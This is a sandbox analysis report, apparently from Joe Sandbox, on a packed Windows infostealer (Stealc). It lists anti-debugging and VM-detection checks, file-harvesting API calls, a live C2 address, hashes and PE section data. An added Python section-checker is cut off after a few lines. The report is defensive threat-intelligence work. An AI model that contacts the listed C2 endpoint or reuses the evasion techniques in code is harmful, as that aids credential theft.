                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E4F0 second address: 57E50B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F737h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E50B second address: 57E515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB438CB0BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E515 second address: 57E523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F72Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580AB9 second address: 580ACB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5807AE second address: 5807BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F72Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5807BF second address: 5807CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jno 00007FB438CB0BF6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5807CF second address: 5807EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F737h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583BAD second address: 583BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583BB1 second address: 583BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583BBB second address: 583C0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB438CB0BF6h 0x00000008 jmp 00007FB438CB0BFFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 ja 00007FB438CB0BF6h 0x00000016 pop esi 0x00000017 push ecx 0x00000018 jp 00007FB438CB0BF6h 0x0000001e jmp 00007FB438CB0C02h 0x00000023 pop ecx 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FB438CB0C01h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583C0A second address: 583C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583C10 second address: 583C39 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB438CB0BF6h 0x00000008 jmp 00007FB438CB0C07h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FB438CB0BF6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5858AD second address: 5858B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58940D second address: 58941C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 jbe 00007FB438CB0BF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58958C second address: 5895A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C6F731h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5895A7 second address: 5895AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5895AD second address: 5895B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536916 second address: 53691A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53691A second address: 536928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FB438C6F72Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 550B31 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5B2DA0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00134910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0012DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0012E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0012ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00134570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0012DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0012BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0012F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00133EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00133EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00121160 GetSystemInfo,ExitProcess,0_2_00121160
                Source: file.exe, file.exe, 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1817097974.0000000001054000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware}@
                Source: file.exe, 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1817097974.0000000001054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13527
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13530
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13549
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13541
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13581
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001245C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_001245C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00139860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139750 mov eax, dword ptr fs:[00000030h] | 0_2_00139750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00137850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00137850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00139600
Source: file.exe, 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: file.exe | Binary or memory string: Y Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00137B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00136920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00136920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00137850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00137850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00137A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00137A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1775667377.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1775667377.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
http://185.215.113.37/ws | 100% | URL Reputation | malware |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37vly | file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/b5 | file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpo | file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpv | file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php3 | file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phps | file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1531077
Start date and time: 2024-10-10 20:24:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 82
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
• VT rate limit hit for: file.exe
No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
No context
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.945294044164301
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'852'928 bytes
MD5: 3c4a472bba3dee50286e154336b9643e
SHA1: 8aeb79c1357013ae448e4365786b3352d5436b11
SHA256: 8bc63380429f0d4476b62f4e52eca341094f21d326f82535d61a5a5035840a89
SHA512: 7e2f9947e0172e063983f6bd567be598f4aee91885f2a34b26ad7e4dd5578dcead00951ce8ea8edd6b90b6deb7c9a73662c485d9f700c355ca86f6065ceedb25
SSDEEP: 49152:97I11HeczEVCS/LBjkb5V1lvQX74JYYEdsRmSD1:97I11VzEw2LB4FVXYL4JqswU
TLSH: 2385333DE9221D65EA67DB70DCA1DE3C95B4117DCA248B2F5A79C31A341A220F1213FA
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xa9e000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007FB438C3B30Ah
Programming Language:
• [C++] VS2010 build 30319
• [ASM] VS2010 build 30319
• [ C ] VS2010 build 30319
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 06c0b67e561758e2897a0e4744596f60 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2a0000 | 0x200 | cec0ecbd21db2491ccd5696e8dd4aff9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wdprdbdb | 0x4fe000 | 0x19f000 | 0x19e400 | 0183850ce463f1e19e56df419b6a15c8 | False | 0.9946403986873869 | data | 7.95311750631902 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rwcfgkti | 0x69d000 | 0x1000 | 0x400 | cff930119e13f4463c816d5b274ca356 | False | 0.7861328125 | data | 6.1114591601782315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x69e000 | 0x3000 | 0x2200 | cc3b851385ec88255a882a40fb07ecd5 | False | 0.006548713235294118 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            DLL           Import
                            kernel32.dll  lstrcpy
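The section table above has the shape of a packed binary rather than a compiler's output: two sections with no name at all, two with random-looking names (wdprdbdb, rwcfgkti), every section mapped readable, writable and executable at once, one section at 7.95 bits of entropy, a .rsrc with a 0x1000 virtual size but no bytes on disk, and a single import (kernel32.dll!lstrcpy) for a 1.8 MB file. As an added example (it is not Joe Sandbox code and not part of the sample), the Python below parses real IMAGE_SECTION_HEADER records with struct and flags those properties: odd or non-standard section names, write+execute mappings, sections with zero raw size, near-8-bit entropy, and an entry point that lands in a non-standard section. The PE it runs on is constructed inline to mirror the shapes seen in the table (a nameless write+execute section holding the entry point, an ordinary .text, a .rsrc with zero raw size); the entropy threshold and the list of "standard" names are my assumptions, not a published rule.

```python
import math
import struct

# IMAGE_SECTION_HEADER Characteristics bits (winnt.h).
IMAGE_SCN_CNT_CODE = 0x00000020
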